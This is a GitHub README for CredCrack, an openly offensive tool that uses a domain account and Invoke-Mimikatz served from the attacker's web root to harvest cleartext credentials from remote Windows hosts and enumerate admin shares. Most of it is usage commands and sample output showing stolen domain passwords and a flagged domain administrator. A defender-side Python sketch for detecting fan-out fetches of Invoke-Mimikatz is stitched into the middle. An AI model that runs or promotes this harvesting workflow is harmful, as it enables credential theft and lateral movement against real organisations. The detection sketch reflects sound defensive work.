A fast and stealthy credential harvester
gojhonny Merge pull request #17 from bryant1410/master
Fix broken headings in Markdown files
Latest commit 574171f Apr 18, 2017
LICENSE initial commit Jul 24, 2015
README.md Fix broken Markdown headings Apr 18, 2017
credcrack.py version update Aug 27, 2015




CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials recursively, in memory and in the clear. Upon completion, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded!

CredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory. Download Invoke-Mimikatz Here


usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username


./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l -t 20


Enumerating Share Access

./credcrack.py -r -d acme -u bob -es
  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
[*] Validating
[*] Validating
[*] Validating

 ----------------------------------------------------------------- - Windows 7 Professional 7601 Service Pack 1 
 OPEN      \\\ADMIN$ 
 OPEN      \\\C$ 

 ----------------------------------------------------------------- - Windows Vista (TM) Ultimate 6002 Service Pack 2 
 OPEN      \\\ADMIN$ 
 OPEN      \\\C$ 
 CLOSED    \\\F$ 

 ----------------------------------------------------------------- - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
 CLOSED    \\\C$ 
 OPEN      \\\SYSVOL 

[*] Done! Completed in 0.8s

Harvesting credentials

./credcrack.py -f hosts -d acme -u bob -l

  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
[*] Setting up the stage
[*] Validating
[*] Validating
[*] Querying domain admin group from
[*] Harvesting credentials from
[*] Harvesting credentials from

                  The loot has arrived...
                       | /         /    
                       `. ())oo() .      
                       %| |-%-------|       
                      % \ | %  ))   |       
                      %  \|%________|       

[*] Host: Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: Domain: ACME User: daguy Password: P@ssw0rd1!

     1 domain administrators found and highlighted in yellow above!

[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s
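
A defender-side sketch, added here and not part of CredCrack or its README: because the tool needs Invoke-Mimikatz.ps1 in a web root (/var/www) and harvests several hosts in parallel, one observable is multiple internal clients requesting that script from the same server within a short window. The log format, the IP addresses, and the assumption that harvested hosts fetch the script over HTTP are constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Default script name from the README; matched case-insensitively after URL decoding.
SCRIPT_RE = re.compile(r"invoke-mimikatz", re.IGNORECASE)

# Constructed proxy/flow log: timestamp, client IP, server IP, method, path.
SAMPLE_LOG = """\
2017-04-18T10:00:01 10.0.0.21 10.0.0.99 GET /Invoke-Mimikatz.ps1
2017-04-18T10:00:02 10.0.0.22 10.0.0.99 GET /invoke-mimikatz.ps1
2017-04-18T10:00:03 10.0.0.23 10.0.0.99 GET /Invoke%2DMimikatz.ps1
2017-04-18T10:05:00 10.0.0.21 10.0.0.50 GET /index.html
2017-04-18T11:30:00 10.0.0.40 10.0.0.77 GET /tools/Invoke-Mimikatz.ps1
"""

def parse(log_text):
    """Yield (timestamp, client, server, decoded_path) for well-formed lines."""
    for line in log_text.splitlines():
        parts = line.split(None, 4)
        if len(parts) != 5:
            continue  # skip malformed lines
        ts, client, server, _method, path = parts
        yield datetime.fromisoformat(ts), client, server, unquote(path)

def find_fanout(log_text, window=timedelta(seconds=60), min_clients=2):
    """Map each server to the clients that fetched the script within one window."""
    hits = defaultdict(list)
    for ts, client, server, path in parse(log_text):
        if SCRIPT_RE.search(path):
            hits[server].append((ts, client))
    alerts = {}
    for server, events in hits.items():
        events.sort()
        best = set()
        for i, (start, _) in enumerate(events):
            # Distinct clients seen within `window` of this event.
            clients = {c for t, c in events[i:] if t - start <= window}
            if len(clients) > len(best):
                best = clients
        if len(best) >= min_clients:
            alerts[server] = sorted(best)
    return alerts

if __name__ == "__main__":
    for server, clients in find_fanout(SAMPLE_LOG).items():
        print(f"{server}: script fetched by {len(clients)} hosts: {clients}")
```

The filename match only catches the default script name; matching on script content in PowerShell script block logs covers renamed copies.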


Contact me at @g0jhonny with any questions or features you'd like to see in the next update. For bugs submit an issue!


CredCrack couldn't have been possible without the contributions of the following individuals. You're all rockstars! @JosephBialek, @brav0hax, @altonjx and everyone else! Thank you for all your contributions and feedback to make this a better script, keep 'em coming!